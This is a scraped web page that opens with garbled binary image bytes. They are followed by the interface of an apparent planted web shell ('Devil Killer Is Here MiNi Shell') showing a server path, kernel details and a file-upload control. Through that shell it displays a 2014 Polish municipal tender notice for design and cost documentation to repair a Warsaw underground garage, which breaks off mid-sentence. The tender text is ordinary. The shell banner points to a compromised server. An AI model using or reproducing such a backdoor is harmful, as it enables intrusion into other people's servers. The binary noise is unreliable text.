JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140918/311198-N-2014.html

<p class="kh_header"><b>Warszawa: Wykonanie dokumentacji projektowo-kosztorysowej na wykonanie remontu podziemnej hali garażowej na terenie posesji przy ul. Madalińskiego 50-52 w Warszawie na podstawie Ekspertyzy Technicznej na temat stanu technicznego konstrukcji oraz przyczyn powstawania przecieków do podziemnej hali garażowej w budynku mieszkalno-użytkowym przy ul. Madalińskiego 50-52 w Warszawie opracowanej w 2013r.</b><br>
<b>Numer ogłoszenia: 311198 - 2014; data zamieszczenia: 18.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej na wykonanie remontu podziemnej hali garażowej na terenie posesji przy ul. Madalińskiego 50-52 w Warszawie na podstawie Ekspertyzy Technicznej na temat stanu technicznego konstrukcji oraz przyczyn powstawania przecieków do podziemnej hali garażowej w budynku mieszkalno-użytkowym przy ul. Madalińskiego 50-52 w Warszawie opracowanej w 2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Opis przedmiotu zamówienia oraz warunki jego realizacji.

1.1. Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-     
              kosztorysowej na wykonanie remontu podziemnej hali garażowej na 
              terenie posesji przy ul. Madalińskiego 50-52 w Warszawie na podstawie 
           Ekspertyzy Technicznej na temat stanu technicznego konstrukcji oraz przyczyn   
           powstawania przecieków do podziemnej hali garażowej w budynku mieszkalno-
         użytkowym przy ul. Madalińskiego 50-52 w Warszawie opracowanej w 2013r., 
              stanowiącej załącznik nr 1 do założeń projektowych i kosztorysowych oraz    
              na podstawie założeń projektowych i kosztorysowych przedstawionych pkt 
             3.1.1. SIWZ, stanowiących również załącznik nr 3 do Rozdziału III SIWZ -  
             istotnych postanowień umowy.
	
             1.1.1. Opis przedmiotu zamówienia wg założeń projektowych i   
                         kosztorysowych   stanowiących załącznik nr 3 do Rozdziału III SIWZ - 
                         istotnych postanowień umowy :

ZAŁOŻENIA PROJEKTOWE



Informacje i wytyczne szczegółowe:
Dokumentację projektową należy opracować w sposób umożliwiający dwuetapowe   
  wykonanie remontu.
- etap I - wykonaie izolacji przeciwwilgociowej, termicznej i nawierzchni podwórka.
- etap II - wykonanie prac remontowych wewnątrz hali.
 Określić zakres wykonania izolacji poziomej stropu nad halą garażową, izolacji 
  pionowej ścian zewnętrznych, uszczelnienia dylatacji pomiędzy halą garażową, a 
  budynkiem mieszkalnym.
 Określić rodzaj nowej nawierzchni na stropie garażu oraz sposób odprowadzenia wód 
  Opadowych.
 Określić zakres prac remontowych planowanych do wykonania wewnątrz hali oraz  
  wszystkie konieczne do wykonania prace dostosowujace obiekt do aktualnych 
  przepisów wymaganych zgodnie z Rozporzadzeniem Ministra Infrastruktury z dnia 12 
  kwietnia 2002r. w sprawie warunków technicznych jakim powinny odpowiadać 
  budynki i ich usytuowanie, a zwłaszcza uwzględnić postanowienia Rozdz.10 § 102 do § 
  108 oraz Rozporządzenie Ministra Infrastruktury z 21.IV.2006r. W sprawie ochrony 
  przeciwpożarowej budynków i innych obiektów budowlanych i terenów 
  Dz.U.06.80.563. 
 Sporządzić w skali 1:20 rysunki obrazujące detale rozwiązań napraw elementów 
  konstrukcyjnych, uszczelnienia dylatacji, połączeń izolacji.
 Określić kolejność prowadzenia robót.

Zakres zamawianego opracowania:
Dokumentacje projektowe muszą zawierać:
 Projekt budowlany remontu podziemnej hali garażowej z wymianą nawierzchni.
Przedmiary robót dla potrzeb sporządzenia kosztorysu ofertowego.
Informację BIOZ.
Specyfikacje techniczne wykonania i odbioru robót budowlanych.
 Kosztorys inwestorski remontu hali garażowej i wymiany nawierzchni na stropie hali.

Forma opracowania dokumentacji projektowych:
DOKUMENTACJE PROJEKTOWE muszą spełniać wymagania określone 
   w rozporządzeniach: Ministra Transportu, Budownictwa i Gospodarki Morskiej 
   z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu 
   budowlanego (Dz.U. Nr 462 z 2012 r.), oraz Ministra Infrastruktury 
   z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji 
   projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz 
   programu funkcjonalno-użytkowego (tekst jedn. Dz.U. z 2013, nr 1129.
 Przed przystąpieniem do bezpośrednich prac projektowych, w celu wyboru i akceptacji 
   przez Zamawiającego, Projektant przedstawi Zamawiającemu propozycje wykonania 
   prac remontowych jak najtańszych z możliwych, spełniających jednocześnie wszystkie 
   warunki techniczne. 
PROJEKT BUDOWLANY remontu hali garażowej, wymiany izolacji i nawierzchni 
   na stropie opracować należy w 5 egzemplarzach w wersji papierowej oraz w wersji 
    elektronicznej z pełnymi uzgodnieniami. Rysunki detali zostaną wykonane 
    w skali 1:20. Wersja elektroniczna powinna być zapisana na nośniku 
    elektronicznym (płyta CD), preferowany jest zapis w formacie z rozszerzeniem 
    pdf.

PRZEDMIAR ROBÓT dla potrzeb sporządzenia kosztorysu ofertowego należy 
    wykonać w 2 egzemplarzach oraz w wersji elektronicznej. Wersja 
    elektroniczna powinna być zapisana na nośniku elektronicznym (płyta CD), 
    preferowany jest zapis w formacie z rozszerzeniem ATH (NORMA). 

Każdy egzemplarz dokumentacji projektowej powinien być trwale oprawiony. 
Dokumentacja nie może zawierać żadnych materiałów reklamowych producentów materiałów budowlanych itp. oraz żadnych reklam.
Projektant zobowiązany jest do uzyskania własnym kosztem i staraniem wszelkich niezbędnych dla prawidłowej realizacji zamówienia, koniecznych do wykonania projektu, materiałów i uzgodnień z jednostkami zewnętrznymi oraz materiałów wyjściowych np. mapy do celów projektowych itp. 

       Forma opracowania specyfikacji technicznej wykonania i odbioru robót:
  SPECYFIKACJA TECHNICZNA wykonania i odbioru robót budowlanych musi być 
       wykonana zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra 
       Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy 
       dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót 
       budowlanych oraz programu funkcjonalno-użytkowego (tekst jedn. Dz.U. z 2013, 
       nr 1129), w 2 egz. oraz w wersji elektronicznej, wersja elektroniczna powinna być 
       zapisana na nośniku elektronicznym (płyta CD), preferowany jest zapis w formacie 
       z rozszerzeniem doc. 

ZAŁOŻENIA KOSZTORYSOWE

      Forma opracowania kosztorysów inwestorskich:
  KOSZTORYSY INWESTORSKIE należy wykonać w 2 egzemplarzach oraz   
      w wersji elektronicznej, (za pomocą programu kosztorysowego NORMA na płycie 
      CD) z rozszerzeniem ATH. Kosztorysy inwestorskie muszą być wykonane zgodnie z  
      Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie 
      określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania 
      planowanych kosztów prac projektowych oraz planowanych kosztów robot 
      budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 
      z 2004r.poz. 1389).
Kosztorysy inwestorskie wykonać na podstawie sporządzonego przedmiaru stanowiącego część dokumentacji projektowej, metodą szczegółową w oparciu o kosztorysowe normy nakładów rzeczowych określone w katalogach KNR wydanych przez Ministra Gospodarki Przestrzennej i Budownictwa oraz normy zakładowe ZGN, a w przypadku braku w nich odpowiednich nakładów rzeczowych należy zastosować katalogi KNR-W wydane przez WACETOB. W przypadku braku odpowiednich pozycji również w tych katalogach (lub możliwości zastosowania analogii do nich) można wykorzystać inne dostępne na rynku katalogi norm albo wykonać kalkulację indywidualną po zaakceptowaniu przez Zamawiającego tj. inspektora nadzoru i Kierownika DOM.

W kalkulacji szczegółowej cen jednostkowych należy przyjąć następujące ceny   
   czynników produkcji oraz wskaźniki narzutów:
   - stawkę robocizny kosztorysowej R - jako średnią dla miasta Warszawy stawkę 
     za jedną roboczogodzinę w branży budowlanej publikowaną w wydawnictwach 
      SEKOCENBUD BCR - wydanie aktualne dla daty sporządzenia dokumentacji 
      projektowej i kosztorysowej.
   - ceny jednostkowe materiałów M - jako średnie wraz z kosztami zakupu ceny 
     materiałów, publikowane w wydawnictwach SEKOCENBUD Informacjach 
     o cenach czynników produkcji RMS (IMB wydanie aktualne dla daty sporządzenia 
     dokumentacji projektowej i kosztorysowej, oraz ceny materiałów budowlanych 
     opracowanych przez wydawnictwo SEKOCENBUD na zamówienie ZGN Mokotów. 
  - ceny jednostkowe pracy sprzętu S - jako średnie dla miasta Warszawy ceny  
    pracy sprzętu, publikowane w wydawnictwach SEKOCENBUD BCR informacja 
     o cenach czynników produkcji RMS lub IRS wydanie aktualne dla daty 
     sporządzenia dokumentacji projektowej i kosztorysowej.
  - wskaźnik narzutu kosztów pośrednich Wkp - jako średni dla miasta Warszawy   
     wskaźnik w danej branży, publikowany w wydawnictwach SEKOCENBUD BCR - 
     wydanie aktualne dla daty sporządzenia dokumentacji projektowej 
     i kosztorysowej. Koszty pośrednie Kp należy liczyć od (R + S),.
  - wskaźnik narzutu zysku Wz - jako średni dla miasta Warszawy wskaźnik   
    w danej branży, publikowany w wydawnictwach SEKOCENBUD BCR - wydanie 
    aktualne dla daty sporządzenia dokumentacji projektowej i kosztorysowej. Zysk 
    Z należy liczyć od (R+S+Kp).

Kosztorysy oraz przedmiary robót powinny obejmować pełen zakres robót niezbędny do realizacji zamówienia.
Do kosztorysów inwestorskich należy dołączyć: zbiorcze zestawienie wartości cen materiałów wraz z kosztami zakupów, zestawienie wartości cen pracy sprzętu bez narzutów i zestawienie wartości robocizny bez narzutów.
Każdy egzemplarz kosztorysu inwestorskiego powinien być trwale oprawiony.




Załącznik do założeń projektowych i kosztorysowych stanowi :
- ekspertyza techniczna opracowana przez BARG Diagnostyka Budowli Sp.z o.o.

          1.1.2. Budynek jest administrowany przez ZGN Mokotów i znajduje się na    
  terenie DOM Wiśniowa ul. Falęcka 10, Warszawa.

1.2.  Szczegółowe określenie zakresu prac projektowo-kosztorysowych, o których mowa 
         w pkt 3.1. siwz zawierają założenia projektowe i kosztorysowe, stanowiące 
         załącznik nr 3 do  III Rozdziału SIWZ - istotnych postanowień umowy. 
              Przy opracowaniu projektu należy dążyć do minimalizacji kosztów robót 
              wykonanych na podstawie projektu.    

1.3. Jednostka projektowa zobowiązana jest do pełnienia bezpłatnie nadzoru autorskiego zgodnie z obowiązującymi w tym zakresie przepisami prawa w czasie wykonywania robót na podstawie tej dokumentacji. 

1.4. Wykonawca jest zobowiązany do przeniesienia praw autorskich na Zamawiającego.

1.5. Czynności, o których mowa w pkt. 3.1. - 3.2. specyfikacji mają być wykonane zgodnie z:
       1.5.1. warunkami wynikającymi z przepisów technicznych i Prawa Budowlanego, 
       1.5.2. wymogami wynikającymi z Polskich Norm, w sposób czytelny i jednoznaczny z podaniem legendy indywidualnych oznaczeń graficznych,
       1.5.3. zasadami rzetelnej wiedzy technicznej i sztuką budowlaną,
       1.5.4. założeniami projektowymi i kosztorysowymi do wykonania dokumentacji   
                  projektowo - kosztorysowej wraz z Ekspertyzą Techniczną na temat stanu              
                  technicznego konstrukcji oraz przyczyn powstawania przecieków do 
                  podziemnej hali garażowej w budynku mieszkalno-użytkowym przy ul. 
                  Madalińskiego 50-52 w Warszawie opracowaną w 2013r. stanowiącymi 
                  załącznik nr 3 do III Rozdziału specyfikacji istotnych warunków zamówienia - 
                  istotnych postanowień umowy,
       1.5.5. warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia,
       1.5.6.  postanowieniami ustawy Prawo zamówień publicznych. 

Kosztorys oraz przedmiar  robót powinien obejmować pełen zakres robót 
             niezbędny  do realizacji zamówienia. 

W przypadku wystąpienia wad ukrytych w dokumentacji, których nie ujawniono 
             w  czasie jej odbioru, Jednostka Projektowa zobowiązana będzie nieodpłatnie 
             do naniesienia poprawek i uzupełnień w terminie 3-ch dni od daty 
             zawiadomienia.
                                                                                                
Wykonawca, przy realizacji zamówienia, zobowiązany jest do uzyskania dostępu 
             do pomieszczeń we własnym zakresie.

1.9. Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r., poz. 1409 z  późn. zm.).

1.10. Wycena ryczałtowa podana w ofercie musi być wykonana w oparciu o Środowiskowe Zasady Wyceny Prac Projektowych I.P.B., przy stawce nie wyższej niż 20,00 PLN-j.n.p. (bez podatku VAT) zgodnie z decyzją Zarządu Rady Koordynacyjnej Biur Projektów z dnia 06.11.2013r.

1.11. Szczegółowy zakres obowiązków Wykonawcy zawarty jest w § 1 istotnych postanowień umowy, które stanowią Rozdział III do niniejszej specyfikacji.

1.12. Wynagrodzenie ostateczne - ryczałt - za wykonany pełen zakres prac - 
                     będzie obejmować łącznie wynagrodzenie podstawowe, podatek VAT oraz 
                     uzyskane przez Wykonawcę własnym kosztem i staraniem wszelkie 
                     niezbędne materiały, uzgodnienia.

1.13. Wymagania dotyczące gwarancji : 
          Zamawiający wymaga udzielenia gwarancji na wykonaną dokumentację 
          projektową i kosztorysową do czasu wygaśnięcia odpowiedzialności Wykonawcy 
          robót z tytułu gwarancji i rękojmi na roboty wykonane na podstawie opracowanej 
          dokumentacji. Warunki gwarancji zawierają Istotne postanowienia umowy  
          stanowiące Rozdział III specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, o których mowa w art. 67 ust. 1 pkt  6 ustawy zamówień z dnia 29 stycznia 2004r. Prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przedmiotowym postępowaniu wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
1.1.             Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie 
             realizacji usług stanowiących przedmiot zamówienia, tj. musi wykazać, że  
             w okresie ostatnich trzech lat przed upływem terminu składania ofert, a 
             jeżeli okres prowadzenia działalności jest krótszy - w tym okresie 
             wykonał, a w przypadku świadczeń okresowych lub ciągłych również 
             wykonuje, co najmniej 3 usługi polegające na wykonaniu dokumentacji 
             projektowo-kosztorysowej odpowiadającej przedmiotowi zamówienia,  o 
             wartości nie mniejszej niż 9.000,00 zł brutto każda. 
                           Spełnienie ww  warunku Zamawiający oceniał będzie na podstawie 
                           załączonego do oferty wykazu wykonanych głównych usług, określonych 
                           w pkt 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 4 
                           do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.6. 
                           SIWZ  potwierdzających, że wymienione w nim usługi zostały wykonane w 
                           sposób należyty lub są wykonywane należycie.
2.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
              osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych 
              innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi 
              stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić 
              Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji 
              zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie 
              podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres 
              korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
              Zamawiający wymaga aby składany dokument-dokumenty dotyczyły w 
              szczególności:
              - zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację       
             wskazującą, który konkretny zasób jest udostępniany. W przypadku 
             udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać 
             osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku 
             udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę 
             uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W 
             przypadku udostępnienia potencjału technicznego należy wskazać przekazanie 
             do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń 
              technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia  
              zdolności finansowych-  przeniesienie własności pieniędzy lub pozostawienie do 
              dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej 
              odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci 
              posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.

   - sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy   
      wykonywaniu zamówienia.

- charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem. 

- zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,


Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający żąda wykazania za pomocą dokumentów wymaganych w pkt. 9.3 i 9.4. specyfikacji istotnych warunków zamówienia, iż w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 i ust. 2 pkt. 5 ustawy, o ile podmioty te będą brały udział w realizacji części zamówienia. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia warunki, o których mowa w art. 22 ust. 1 mogą być spełnione  łącznie.  

3.W przypadku gdy Wykonawca polegać będzie na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu (w oryginale): 
            3.1.  pisemne zobowiązanie tych podmiotów do zrealizowania części zamówienia zawierające zakres robót, które te podmioty zobowiązują się wykonać i konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.)- w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na wiedzy i doświadczeniu innych podmiotów zakresie realizacji części zamówienia.
            3.2.   pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy osób, które będą uczestniczyć w realizacji zamówienia, zawierające także imienną listę tych osób - w przypadku gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu polega na osobach zdolnych do wykonani zamówienia innych podmiotów.
           3.3.   inne dokumenty i oświadczenia, zgodnie z wymogiem pkt. 8.2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania 
  na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. 
            Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a 
            także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 ww 
            ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
     Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o 
     spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 3 do 
     wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie 
     spełniania warunków w zakresie wskazanym poniżej:
1.1.                          Wykonawca musi wykazać, że dysponuje osobami, które będą wykonywać 
                          dokumentację projektowo-kosztorysową, posiadającymi kwalifikacje 
                          zawodowe, doświadczenie i stosowne uprawnienia budowlane do 
                          projektowania bez ograniczeń w specjalności ogólnobudowlanej, 
                          właściwej do wykonania przedmiotu zamówienia lub odpowiadające ww. 
                          w przypadku uprawnień wydanych przed dniem 30.12.1994 r. oraz  
                          aktualne zaświadczenia o wpisaniu na listę członków właściwej Izby 
                          Samorządu Zawodowego. 
                          Spełnianie ww. warunku oceniane będzie na podstawie przedłożonego w 
                          ofercie wykazu osób (wg wzoru stanowiącego załącznik nr 5 do
                          formularza oferty ). W ww wykazie należy podać informacje na temat  
                          kwalifikacji zawodowych tych osób, ich uprawnień, doświadczenia i 
                          wykształcenia niezbędnego do wykonania zamówienia,  a także zakresu 
                          wykonywanych przez nich czynności i podstawie do dysponowania nimi. 
                          Wykonawca wybrany do podpisania umowy musi przedłożyć do umowy 
